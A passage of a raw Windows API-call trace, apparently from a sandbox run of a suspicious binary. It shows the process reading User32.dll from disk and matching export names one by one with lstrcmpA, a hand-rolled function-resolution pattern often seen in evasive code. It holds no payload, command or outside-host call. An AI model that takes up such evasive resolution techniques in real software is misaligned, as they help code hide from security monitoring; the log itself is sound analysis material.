lpString2="AssocQueryStringA") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0252.643] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0252.644] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0252.644] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0252.644] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0252.644] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0252.644] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0252.644] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0252.644] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0252.644] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0252.645] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0252.645] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0252.646] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0252.646] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0252.646] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0252.646] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0252.646] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0252.646] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0252.647] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0252.647] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0252.648] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0252.648] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0252.649] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0252.661] GetProcessHeap () returned 0x4e0000 [0252.661] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x4e0000) returned 1 [0252.661] GetProcessHeap () returned 0x4e0000 [0252.661] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9020 [0252.661] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0252.661] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.824] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.824] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0252.825] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.825] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.825] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.825] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0252.825] GetProcessHeap () returned 0x4e0000 [0252.825] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1555b8) returned 0x40e7040 [0252.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.829] ReadFile (in: hFile=0x17c, lpBuffer=0x40e7040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e7040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0252.851] CloseHandle (hObject=0x17c) returned 1 [0252.851] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0252.851] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0252.851] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0252.851] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0252.851] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0252.851] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0252.851] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0252.851] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0252.851] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0252.851] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0252.851] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0252.851] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0252.851] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0252.851] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0252.852] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0252.852] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0252.852] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0252.852] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0252.853] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0252.853] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0252.853] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0252.854] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0252.854] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0252.854] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0252.854] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0252.854] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0252.854] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0252.854] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0252.855] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0252.855] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0252.855] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 